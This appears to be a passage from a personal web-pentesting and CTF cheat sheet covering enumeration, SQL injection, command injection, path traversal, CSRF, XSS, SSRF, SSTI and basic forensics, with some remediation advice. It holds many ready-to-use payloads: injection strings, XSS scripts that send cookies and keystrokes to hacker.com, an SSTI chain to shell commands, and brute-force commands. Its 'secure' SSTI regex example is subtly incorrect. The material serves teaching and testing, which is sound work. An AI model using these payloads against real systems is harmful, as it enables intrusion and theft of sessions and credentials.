5. Check favicon to find the website frameworks (only works if the website developer doesn’t replace this with a custom one)
   Run this to find its md5 hash:
   curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum
   Check this database to find the framework.
6. Check the sitemap file for disallowed/hidden files
7. Curl HTTP Headers to find potential information about the webserver software and possibly the programming/scripting language in use. curl http://10.10.134.48 -v The -v switch enables verbose mode, which will output the headers
8. Look out for cookie values and change them if possible. Look after Base64 encoded values, JWT tokens, or maybe case folded values that can be used to bypass authentication with simply using casefold(). (Example: ‘ß’ -> ‘ss’)
9. Test for Cross-site scripting
10. Test with SQL injection methods
11. Try Flask Template Injection (SSTI) with {{config}} in the url. If it works, try {{ get_user_file("/etc/passwd") }}
12. Check .htaccess file for apache server configurations.
13. Grab banners/headers for framework, authentication and misconfiguration discovery curl -IL https://www.inlanefreight.com
14. Check the source code for any comments or hidden information in the inspector view.

When successfully finding a framework using on of the methods, Framework Stacking can be used afterwards where you check the framework documentation for potential admin portals etc.

Automated

What is Automated Discovery?
Automated discovery is the process of using tools to discover content rather than doing it manually. This process is automated as it usually contains hundreds, thousands or even millions of requests to a web server. These requests check whether a file or directory exists on a website, giving us access to resources we didn’t previously know existed. This process is made possible by using a resource called wordlists.

What are wordlists?
Wordlists are just text files that contain a long list of commonly used words; they can cover many different use cases. For example, a password wordlist would include the most frequently used passwords, whereas we’re looking for content in our case, so we’d require a list containing the most commonly used directory and file names.

Most common Automation tools
ffuf, dirb and gobuster.

Example use for all three tools:

$ ffuf -w <wordlist>:FUZZ -u <IP>/FUZZ
$ dirb http://<IP>
$ gobuster dir -u http://<IP> -w <wordlist>

OSINT

Google Hacking / Dorking
Google hacking / Dorking utilizes Google’s advanced search engine features, which allow you to pick out custom content.

Find many more operators here.

Wappalyzer
Wappalyzer is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well. Read more here.

Wayback Machine
The Wayback Machine is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website. Find the website here.

Email Harvesting
Email harvesting is the process of gathering email addresses from a website. This can be done manually by searching for email addresses in the source code of a website, or by using a tools such as Hunter.io and Phonebook. In order to verify the email addresses, you can use EmailHippo.

Subdomain enumeration

SSL/TLS Certificates
When a Certificate Authority (CA) issues an SSL/TLS certificate, it logs it in public Certificate Transparency (CT) logs. These logs can be searched for current and historical certificates on sites like crt.sh .

Search Engines
To search for subdomains of a domain:
-site:www.domain.com site:*.domain.com

DNS Bruteforce
Bruteforce DNS (Domain Name System) enumeration is the method of trying tens, hundreds, thousands or even millions of different possible subdomains from a pre-defined list of commonly used subdomains. For this method, the tool DNSrecon, Sublist3r or Turbolist3r can be used. A more modern but slower alternative is Amass.

It is usually also a good idea to probe for HTTP and HTTPS services on the discovered subdomains to filter out any false positives. This can be done with the tool httprobe.

Virtual Hosts
Some subdomains aren’t always hosted in publically accessible DNS results, such as development versions of a web application or administration portals. Instead, the DNS record could be kept on a private DNS server or recorded on the developer’s machines in their /etc/hosts file (or c:\windows\system32\drivers\etc\hosts file for Windows users) which maps domain names to IP addresses.

Because web servers can host multiple websites from one server when a website is requested from a client, the server knows which website the client wants from the Host header. We can utilise this host header by making changes to it and monitoring the response to see if we’ve discovered a new website.

Bruteforce by using the following command:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: {domain}" -u http://{IP} -fs {size}

Cookie Manipulation

1. Check for JWT tokens at JWT.io
2. Flask cookies can be unsigned by using the following tool flask-unsign
3. Flask cookies can be decoded/encoded using the following tool: Flask Session Cookie Decoder/Encoder. See example usage here

SQL Injection

SQL (Structured Query Language) Injection occurs when user controlled input is passed to SQL queries without validation/sanitization. As a result, an attacker can pass in SQL queries to manipulate the outcome of such queries.

If an attacker is able to successfully pass input that is interpreted correctly, they would be able to do the following:

• Access, Modify and Delete information in a database when this input is passed into database queries. This would mean that an attacker can steal sensitive information such as personal details and credentials.
• Execute Arbitrary system commands on a server that would allow an attacker to gain access to users’ systems. This would enable them to steal sensitive data and carry out more attacks against infrastructure linked to the server on which the command is executed.

SQL Injection Types

In-band SQLi (Classic SQLi)
In-band SQLi is the most common and easy-to-exploit of SQL injection attacks. In-band SQLi attacks rely on the fact that the same communication channel is used for both the attack and the result. There are two types of in-band SQLi attacks:

• Error-based SQLi - This type of SQL injection relies on error messages thrown by the database server to obtain information about the structure of the database. This information can then be used to formulate more attacks.
• Union-based SQLi - This type of SQL injection relies on using the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.

Inferential SQLi (Blind SQLi)
Inferential SQLi is also known as blind SQL injection. As the name suggests, the vulnerability itself is not directly present in the application but can be inferred from the behaviour of the application. There are two types of inferential SQLi attacks being:

• Boolean-based SQLi - This type of SQL injection relies on sending SQL queries to the database which evaluate to either TRUE or FALSE. Depending on the result, the content within the HTTP response will change, or remain the same.
• Time-based SQLi - This type of SQL injection relies on sending SQL queries to the database which cause a time delay in the response. The time delay is used to infer if the result of the query is TRUE or FALSE.

See much more database and SQLi related information here.

Tool for SQL Injection

sqlmap is a tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. See how to use it here.

Examples of SQL Injection

• '' OR 1=1 --'
• ' OR 1=1 --
• 1' OR 1=1 --
• 1' OR 1=1#
• 1' OR 1=1--
• 1' OR 1=1;--
• 1" or "1"="1"-- -

Command Injection

Command injection is the abuse of an application’s behaviour to execute commands on the operating system, using the same privileges that the application on a device is running with.

A command injection vulnerability is also known as a “Remote Code Execution” (RCE) because an attacker can trick the application into executing a series of payloads that they provide, without direct access to the machine itself (i.e. an interactive shell). The webserver will process this code and execute it under the privileges and access controls of the user who is running that application.

Discovering Command Injection

This vulnerability exists because applications often use functions in programming languages such as PHP, Python and NodeJS to pass data to and to make system calls on the machine’s operating system. For example, taking input from a field and searching for an entry into a file.

Example of a vulnerable code in PHP:

<?php
    $file = $_GET['file'];
    $command = "cat $file";
    system($command);
?>

Example of a vulnerable code in Python (Flask):

@app.route('/search')
def search():
    query = request.args.get('query')
    command = "grep -r " + query + " /var/www/html"
    output = subprocess.check_output(command, shell=True)
    return output

Command Injection can be detected in mostly one of two ways:

Detecting Blind Command Injection:
Use time-delay payloads like ping or sleep to test for injection by observing response delays. Another method is redirecting output using > (e.g., whoami > file) and then reading the file with cat.

The curl command is a great way to test for command injection. This is because you are able to use curl to deliver data to and from an application in your payload.

curl http://vulnerable.app/process.php?search=The%20Beatles;whoami

Detecting Verbose Command Injection:
This is easier to detect since the output of commands like ping or whoami is displayed directly on the web application.

Exploiting Command Injection

Applications that use user input to populate system commands with data can often be combined in unintended behaviour. For example, the shell operators ;, & and && will combine two (or more) system commands and execute them bot

Useful payloads for command injection (linux):

Useful payloads for command injection (windows):

Commands that quickly can be tested:

whoami
$(whoami)
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami

To test for a security misconfiguration in Python, we can use the os module to execute commands:

import os; print(os.popen("ls -l").read())

When found cat /etc/os-release can be used to find the OS version and other useful information.

A useful tool in Windows we can use to gain RCE is certutil.exe (certutil.exe -urlcache -f <url> <filename>). This command is a native Windows CLI program installed as part of Certificate Services. It’s handy in engagements because it is a binary signed by Microsoft and allows us to make HTTP/s connections. In our scenario, we can use it to make an HTTP request to download a file from a web server that we control to confirm that the command was executed.

See this cheatsheet for more.

Remediating Command Injection

Command injection can be prevented in a variety of ways. Everything from minimal use of potentially dangerous functions or libraries in a programming language to filtering input without relying on a user’s input.

Vulnerable functions

In PHP, many functions interact with the operating system to execute commands via shell; these include:

• Exec
• Passthru
• System

Snippet for a code that only accept and process numbers between 0-9 as input:

<input type="text" id="ping" name="ping" pattern="[0-9]+"</input>
<?php
echo passthru("/bin/ping -c 4 "$_GET["ping"]"); 
?>

Input sanitisation

Sanitising any input from a user that an application uses is a great way to prevent command injection. This is a process of specifying the formats or types of data that a user can submit. For example, an input field that only accepts numerical data or removes any special characters such as >, & and /.

<?php
if (!filter_input (INPUT_GET, "number", FILTER_VALIDATE_NUMBER)) {
  ...
}
...

Read more about the function filter_input() here.

Bypassing filters

Applications will employ numerous techniques in filtering and sanitising data that is taken from a user’s input. These filters will restrict you to specific payloads; however, we can abuse the logic behind an application to bypass these filters. For example, an application may strip out quotation marks; we can instead use the hexadecimal value of this to achieve the same result.

When executed, although the data given will be in a different format than what is expected, it can still be interpreted and will have the same result.

$payload = "\x2f|\x65 \x74 \x63\x2f\x70\x61 \x73 \x73 \x77\x64"

Directory Traversal

Directory traversal (also known as path traversal) allows attackers to access files and directories outside the web application’s root directory.

Common Payloads:

../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Windows Examples:

..\..\..\windows\system32\drivers\etc\hosts
..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

Testing Methods:

1. URL parameters: file=../../../etc/passwd
2. POST data: In form fields
3. HTTP headers: User-Agent, Cookie
4. File upload paths

Files to Target:

• Linux: /etc/passwd, /etc/shadow, /proc/version
• Windows: C:\windows\system32\drivers\etc\hosts, C:\boot.ini
• Application configs: web.config, config.php, .env

Authentication Bypass

These vulnerabilities can be some of the most critical as it often ends in leaks of customers personal data.

Username Enumeration

To find valid usernames, you can leverage error messages that reveal whether a username already exists. For example, using ffuf, you can automate testing with a wordlist of common usernames.

Example command:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <website_url> -mr "username already exists"

Options:

• -w: Specifies the wordlist path.
• -X: Sets the request method (POST in this case).
• -d: Defines form data with FUZZ placeholder for testing usernames.
• -H: Adds headers (e.g., Content-Type).
• -u: URL to send the request.
• -mr: Looks for specific response text to confirm a valid username.

Brute Force

Brute force attacks try common passwords against usernames. After successful username enumeration, you can use the valid usernames for brute-forcing passwords.

Example command:

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <website_url> -fc 200

Options:

• -w: Specifies multiple wordlists (e.g., W1 for usernames, W2 for passwords).
• -X: Sets the request method (POST here).
• -d: Defines form data with W1 for username and W2 for password.
• -H: Adds headers (e.g., Content-Type).
• -fc: Filters responses by excluding status code 200, indicating a failed login attempt.

Logic Flaw

Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker.

This can be seen here:

if( url.substr(0,6) === '/admin') {
    # Code to check user is an admin
} else {
    # View Page
}

Because the above PHP code example uses three equals signs (===), it’s looking for an exact match on the string, including the same letter casing. The code presents a logic flaw because an unauthenticated user requesting /adMin will not have their privileges checked and have the page displayed to them, totally bypassing the authentication checks.

Example:
A login process: that goes like step 1, 2, 3, 4 but the hacker make it go like 1, 4 which grants the hacker access to another users account.

Case:
Reset another users password and get the link for the reset process to your account. The design flaw here is that you can send a reset password request to support by passing a users name, and then entering your own email to get the link. This can be done by the following command:

curl '<url>/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=berkan@hacker.com'

Cookie Tampering

Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user’s account, or elevated privileges

The contents of some cookies can be in plain text, and it is obvious what they do. Take, for example, if these were the cookie set after a successful login:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

Using this logic, if we were to change the contents of the cookies and make a request we’ll be able to change our privileges.

For this, curl can be used by using:
curl -H "Cookie: logged_in=true; admin=true" <ip_address>/cookie-test

Hashed cookies
Sometimes cookie values can look like a long string of random characters; these are called hashes which are an irreversible representation of the original text. Here are some examples that you may come across:

You can see from the above table that the hash output from the same input string can significantly differ depending on the hash method in use. Even though the hash is irreversible, the same output is produced every time

Encoded cookies
Encoding is similar to hashing in that it creates what would seem to be a random string of text, but in fact, the encoding is reversible

Take the below data as an example which is set by the web server upon logging in: Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/

This string base64 decoded has the value of {"id":1,"admin": false} we can then encode this back to base64 encoded again but instead setting the admin value to true, which now gives us admin access.

Insecure Direct Object Reference

Insecure Direct Object Reference(IDOR) is a type of access control vulnerability.

This type of vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), too much trust has been placed on the input data, and it is not validated on the server-side to confirm the requested object belongs to the user requesting it.

An example of this:
Imagine you’ve just signed up for an online service, and you want to change your profile information. The link you click on goes to http://shop.berkankutuk.dk/profile?user_id=1337, and you can see your information.

Curiosity gets the better of you, and you try changing the user_id value to 420 instead (http://shop.berkankutuk.dk/profile?user_id=420), and to your surprise, you can now see another user’s information. You’ve now discovered an IDOR vulnerability!

File Inclusion (LFI/RFI)

In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. The following graph explains and breaking down the essential parts of the URL.

For example, if a user wants to access and display their CV within the web application, the request may look as follows, http://webapp.thm/get.php?file=userCV.pdf, where the file is the parameter and the userCV.pdf, is the required file to access.

File inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP that are poorly written and implemented. The main issue of these vulnerabilities is the input validation, in which the user inputs are not sanitized or validated, and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability.

If the attacker somehow can write to the server such as /tmp directory, then it is possible to gain remote command execution RCE. However, it won’t be effective if file inclusion vulnerability is found with no access to sensitive data and no writing ability to the server.

Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application’s URL to locate and access files or directories stored outside the application’s root directory.

An example of this can be seen by running this command on a website with this vulnerability:
http://webapp.thm/get.php?file=../../../../etc/passwd

The result would look like this:

Another vulnerable code example in PHP:

<?PHP 
	include($_GET["file"]);
?>

Similarly, if the web application runs on a Windows server, the attacker needs to provide Windows paths

You can find a list of common OS files here

Most of the time in CTF’s the path you are looking for would be: ../../../../etc/passwd

NULL BYTE trick

If a path is placing .php at the end of your search, then this tells us that the developer specifies the file type to pass to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00.

Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.:
/etc/passwd%00

NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above.

Current Directory trick

Though this can be filtered by the developer. But we can also bypass that by trying the “current directory” trick which looks something like this:
/etc/passwd/.

Subset string trick

If the developer uses input validation by filtering some keywords, ex. “../”, we can bypass this by using:
....//....//....//....//....//etc/passwd
This works because the PHP filter only matches and replaces the first subset string ../ it finds and doesn’t do another pass, leaving:
../../../../etc/passwd

Including the Directory trick

If the developer forces you to include a directory, you can bypass this by writing the directory and then moving up from there. Ex. if the forced directory is ’language’:
languages/../../../../../etc/passwd

Remote File Inclusion - RFI

Remote File Inclusion (RFI) is a technique to include remote files and into a vulnerable application. Like LFI, the RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include function. One requirement for RFI is that the allow_url_fopen option needs to be on.

The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server. Other consequences of a successful RFI attack include:

• Sensitive Information Disclosure
• Cross-site Scripting (XSS)
• Denial of Service (DoS)

An external server must communicate with the application server for a successful RFI attack where the attacker hosts malicious files on their server. Then the malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server.

How to

1. Create a file somewhere on your local computer. ex “cmd.txt”
2. Open the file and write some code inside it
3. Now create a webserver using python by running: python3 http.server <port> in the same path of the file.
4. Now open the browser and enter the http address where you want the attack to direct. This could look like this: http://10.10.135.181:9001/cmd.txt

Remediation

As a developer, it’s important to be aware of web application vulnerabilities, how to find them, and prevention methods. To prevent the file inclusion vulnerabilities, some common suggestions include:

1. Keep system and services, including web application frameworks, updated with the latest version.
2. Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
3. A Web Application Firewall (WAF) is a good option to help mitigate web application attacks.
4. Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn’t need them, such as allow_url_fopen on and allow_url_include.
5. Carefully analyze the web application and allow only protocols and PHP wrappers that are in need.
6. Never trust user input, and make sure to implement proper input validation against file inclusion.
7. Implement whitelisting for file names and locations as well as blacklisting.

PHP Filters

PHP filters are used to validate and sanitize external input. The filter extension provides a way to validate and sanitize external inputs. The filter extension is not enabled by default, so you need to enable it in the php.ini file.

Filters can be used by using php://filter. For example, to base64 encode a file, you can use:
php://filter/convert.base64-encode/resource=index.php

Cross Site Request Forgery (CSRF)

CSRF tricks users into performing actions on a web application where they’re authenticated without their knowledge.

How CSRF Works:

1. User logs into vulnerable site (bank.com)
2. User visits malicious site (evil.com)
3. Malicious site triggers request to bank.com using user’s session
4. Bank.com processes request as if user intended it

Example Attack:

<!-- Hidden form that auto-submits -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
    <input type="hidden" name="to" value="attacker_account">
    <input type="hidden" name="amount" value="1000">
</form>
<script>document.getElementById('csrf').submit();</script>

<!-- Or using img tag -->
<img src="https://bank.com/delete_account?confirm=yes">

Detection:

• Look for state-changing requests without CSRF tokens
• Check if anti-CSRF measures can be bypassed
• Test with different HTTP methods (GET, POST, PUT)

Prevention:

• CSRF tokens in forms
• SameSite cookie attribute
• Referer header validation
• Double submit cookies

Cross Site Scripting (XSS)

Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users

Cross-site scripting vulnerabilities are extremely common

DOM-Based XSS

DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document, and this document can be either displayed in the browser window or as the HTML source

This is when an attack payload is executed by manipulating the DOM (Document Object Model) in the target’s browser. This type uses the client-side code instead of server-side code.

Exploiting the DOM
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code. Execution occurs when the website JavaScript code acts on input or user interaction.

Example Scenario:
The website’s JavaScript gets the contents from the window.location.hash parameter and then writes that onto the page in the currently being viewed section. The contents of the hash aren’t checked for malicious code, allowing an attacker to inject JavaScript of their choosing onto the webpage.

Potential Impact: Crafted links could be sent to potential victims, redirecting them to another website or steal content from the page or the user’s session.

How to test for Dom Based XSS: DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You’d need to look for parts of the code that access certain variables that an attacker can have control over, such as “window.location.x” parameters.

When you’ve found those bits of code, you’d then need to see how they are handled and whether the values are ever written to the web page’s DOM or passed to unsafe JavaScript methods such as eval()

Reflected XSS

This is when a malicious script bounces off another website onto the target’s web application or website. Normally, these are passed in the URL as a query, and it’s easy as making the target click a link. This type originates from the target’s request.

Or in other words, reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

Example Scenario:
A website where if you enter incorrect input, an error message is displayed. The content of the error message gets taken from the error parameter in the query string and is built directly into the page source.

How to test for Reflected XSS
You’ll need to test every possible point of entry; these include:

• Parameters in the URL Query String
• URL File Path
• Sometimes HTTP Headers (although unlikely exploitable in practice)

A small test to see if a reflected XSS is possible is to enter a single quote (') into the input field and see if the page breaks or shows an error message. If it does, then it’s likely exploitable.

Another way to test for reflected XSS is to enter the following payload into the input field:

 "><script>alert("exploitable")</script> 

If the page shows an alert box saying “exploitable”, then it’s likely exploitable.

Stored XSS

As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.

Example Scenario:
A blog website that allows users to post comments. Unfortunately, these comments aren’t checked for whether they contain JavaScript or filter out any malicious code. If we now post a comment containing JavaScript, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser.

How to test for Stored XSS:
You’ll need to test every possible point of entry where it seems data is stored and then shown back in areas that other users have access to; a small example of these could be:

• Comments on a blog
• User profile information
• Website Listings

Blind XSS

Blind XSS is similar to a stored XSS (which we covered in task 4) in that your payload gets stored on the website for another user to view, but in this instance, you can’t see the payload working or be able to test it against yourself first.

Example Scenario: A website has a contact form where you can message a member of staff. The message content doesn’t get checked for any malicious code, which allows the attacker to enter anything they wish. These messages then get turned into support tickets which staff view on a private web portal.

Potential Impact: Using the correct payload, the attacker’s JavaScript could make calls back to an attacker’s website, revealing the staff portal URL, the staff member’s cookies, and even the contents of the portal page that is being viewed. Now the attacker could potentially hijack the staff member’s session and have access to the private portal.

How to test for Blind XSS: When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.

A popular tool for Blind XSS attacks is xsshunter. Although it’s possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.

Payload

In XSS, the payload is the JavaScript code we wish to be executed on the targets computer. There are two parts to the payload, the intention and the modification.

The intention is what you wish the JavaScript to actually do, and the modification is the changes to the code we need to make it execute as every scenario is different.

Some examples of XSS intentions.

Proof Of Concept:
This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website. This is often done by causing an alert box to pop up on the page with a string of text, for example:

<script>alert('XSS');</script>

Session Stealing:
Details of a user’s session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target’s cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker’s control to be logged. Once the hacker has these cookies, they can take over the target’s session and be logged as that user.

<script>fetch('https://hacker.com/steal?cookie=' + btoa(document.cookie));</script>

Key Logger:
The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker’s control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.

<script>document.onkeypress = function(e) { fetch('https://hacker.com/log?key=' + btoa(e.key) );}</script>

Business Logic:
This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user’s email address called user.changeEmail(). Your payload could look like this:

<script>user.changeEmail('attacker@hacker.com');</script>

A command to rule them all (Polyglots)

An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.

This command will print “BERKAN_WAS_HERE” on the screen.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('BERKAN_WAS_HERE') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('BERKAN_WAS_HERE')//>\x3e 

Server Side Request Forgery (SSRF)

SSRF, or server-side request forgery, is a security vulnerability that occurs when an attacker tricks a web application into making unauthorised requests to internal or external resources on the server’s behalf.

Types of Attacks

• Basic SSRF: The attacker sends crafted requests from the vulnerable server to internal or external resources, such as accessing files or databases not intended for public access.
• Blind SSRF: Attackers don’t directly see responses but infer information from response times or error message changes.
• Semi-blind SSRF: Attackers don’t receive direct responses but use clues like changes in application behavior or response times to gauge success.

What’s the impact?
A successful SSRF attack can result in any of the following:

• Access to unauthorised areas.
• Access to customer/organisational data.
• Ability to Scale to internal networks.
• Reveal authentication tokens/credentials.

Finding an SSRF

• Identifying Vulnerable Input: Attackers find input fields within the application, like URL parameters in web forms or API endpoints, which can be manipulated to trigger server-side requests.

  <a href="/download?server:8087=secure-file-storage.com&id=75482342">Download</a>
  <!-- Replace the server IP with an attacker-controlled server -->
  <a href="/download?10.10.116.118:1234&id=75482342">Download</a>
  

  And then wait for the server to make a request to the attacker-controlled server.

  nc -lvnp 1234
  

• Manipulating the Input: Attackers input malicious URLs or payloads to cause the application to make unintended requests, such as pointing to internal servers or external ones controlled by the attacker.

  <input type="hidden" name="server" value="=http://server.website.com/store">
  

• Requesting Unauthorized Resources: The application server, unaware of the malicious input, makes requests to the specified URLs or resources, potentially targeting internal or sensitive services.

  https://berkankutuk.dk/form?server=http://server.website.com/store
  

• Exploiting the Response: Attackers exploit the responses from malicious requests to gather valuable information like internal server data, credentials, or pathways for further exploitation. Directory traversal and &x= can also be used in some cases to manipulate paths.

Defeating Common SSRF Defenses

1. Deny List Bypass:
   • Deny lists typically block access to localhost or specific IP addresses like 127.0.0.1. However, attackers can bypass these restrictions by using alternative references such as 0, 0.0.0.0, 127.1, or subdomains that resolve to localhost like 127.0.0.1.nip.io.
2. Allow List Circumvention:
   • Allow lists may restrict URLs to start with https://website.com, but attackers can evade this control by creating subdomains on their own domain, like https://website.com.attackers-domain.com, thus gaining control over internal HTTP requests.
3. Exploiting Open Redirects:
   • Open redirects, which automatically redirect users to another website, can be leveraged by attackers to redirect internal HTTP requests to a domain of their choice, especially if SSRF vulnerabilities have stringent rules allowing only specific URLs like https://website.com/.

Server Side Template Injection (SSTI)

Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can control the template processing engine on the server-side. This allows the attacker to inject and execute code on the server.

Example of SSTI in Python Flask

from flask import Flask, render_template_string
app = Flask(__name__)

@app.route("/profile/<user>")
def profile_page(user):
    template = f"<h1>Welcome to the profile of {user}!</h1>"

    return render_template_string(template)

app.run()

In the above code, the render_template_string function is used to render the template. If the user input is not sanitized, an attacker can inject template code to execute arbitrary commands on the server.

For example, if the attacker sends the following request: http://website.com/profile/{{7*7}}, the server will render the template as <h1>Welcome to the profile of 49!</h1>. This shows that the server is executing the code provided by the attacker.

Finding an SSTI

• Identifying Vulnerable Input: Attackers look for input fields within the application that are used to render templates, such as user profiles or comments, which can be manipulated to trigger SSTI.
• Fuzzing: Most template engines will use a similar character set for their “special functions” which makes it relatively quick to detect if it’s vulnerable to SSTI. Those are ${ {<%[%'"}}%. To manually fuzz all of these characters, they can be sent one by one following each other.

"http://10.10.118.110:5000/profile/$"
"http://10.10.118.110:5000/profile/$\{"
"http://10.10.118.110:5000/profile/${{"
"http://10.10.118.110:5000/profile/${ {<"

Detecting Template Engines

In the best case scenario, the error message will include the template engine, which marks this step complete. However, if this is not the case, we can use a decision tree to help us identify the template engine:

• Green arrow - The expression evaluated (i.e 42)
• Red arrow - The expression is shown in the output (i.e ${7*7})

Exploiting SSTI

Once the template engine is identified, we can use the documentation to exploit the SSTI vulnerability. For this PayloadsAllTheThings is a great resource.

http://10.10.118.110:5000/profile/{{ ''.__class__ }}.

http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__ }}.

http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1] }}.

http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}.

http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}.

http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}.

Remediation

To prevent SSTI vulnerabilities, developers should make use of secure methods and sanitization techniques.

# Insecure: Concatenating input
template = f"<h1>Welcome to the profile of {user}!</h1>"
return render_template_string(template)

# Secure: Passing input as data
template = "<h1>Welcome to the profile of {{ user }}!</h1>"
return render_template_string(template, user=user)

import re

# Remove everything that isn't alphanumeric
user = re.sub("^[A-Za-z0-9]", "", user)
template = "<h1>Welcome to the profile of {{ user }}!</h1>"
return render_template_string(template, user=user)

Server Side Includes (SSI)

Server Side Includes (SSI) is a simple interpreted server-side scripting language used almost exclusively for the Web. It is most useful for including the contents of one or more files into a web page on a web server, using its #include directive.

Finding an SSI

• <!--#exec cmd="ls" -->
• <!--#echo var="DATE_LOCAL" -->
• <!--#exec cmd="cat /etc/passwd" -->

Digital Forensics

Digital forensics is the art of uncovering and investigating electronically stored data. It involves identifying, acquiring, analyzing, and reporting digital evidence.

Use Cases:

• Uncover hidden data in files or metadata.
• Recover lost or deleted data.
• Reconstruct corrupted files.
• Identify file formats and structures.
• Analyze network logs or memory dumps to trace events.
• Crack password hashes for further investigation.

File Analysis

Encodings

• Decimal: 70 111 114 101 110 115 105 99 115 33
• Hex: 46 6f 72 65 6e 73 69 63 73 21
• Octal: 106 157 162 145 156 163 151 143 163 41
• ASCII: Forensics!
• Base64: Rm9yZW5zaWNzIQ==
• Base85: 7W3<YDKBN%F!1

File type

The file type is often indicated by the file extension in the file name, e.g. .png, .mp4

• Typically what the OS uses to assess how to open / interpret the file
• Do not rely on extensions! Can be modified to trick the OS into misinterpreting data

The file type is indicated in the contents of the file with a file signature - a magic number

• Hex string at a specific offset
• Eg PNG files: 89 50 4e 47 (last three hex is PNG in ASCII)
• Tool: file

pngcheck
A command-line tool for “checking” a PNG image file. Especially good for verifying checksums.

from PIL import Image
import numpy as np

# Load the images based on the provided file names
img1 = Image.open('/mnt/data/scrambled1.png')
img2 = Image.open('/mnt/data/scrambled2.png')

# Convert the images to numpy arrays
img_data1 = np.asarray(img1)
img_data2 = np.asarray(img2)

# Perform the element-wise addition of the two images' data
# Since the data type of PIL images is unsigned integer 8 bits,
# the result must be clipped to be in the range [0, 255]
data = np.add(img_data1, img_data2, dtype=np.uint8)

# Create a new image from the combined data
new_image = Image.fromarray(data)

# Save the result image
result_path = "/mnt/data/out.png"
new_image.save(result_path, "PNG")

# Provide the path for downloading the result
result_path

Metadata

The file extension is one form of metadata: (data about data)

Additional information about a file in addition to the content itself

• General: File name, extension, size, time of origin, permissions
• Specific: GPS data in images, number of frames in GIF, CPU architecture in executables, etc.

Why analyze metadata?

• Can store important info - maybe even info that should have been hidden
• In some cases even more important than content - eg with encrypted HTTPS traffic
• Tool: exiftool

Log Analysis
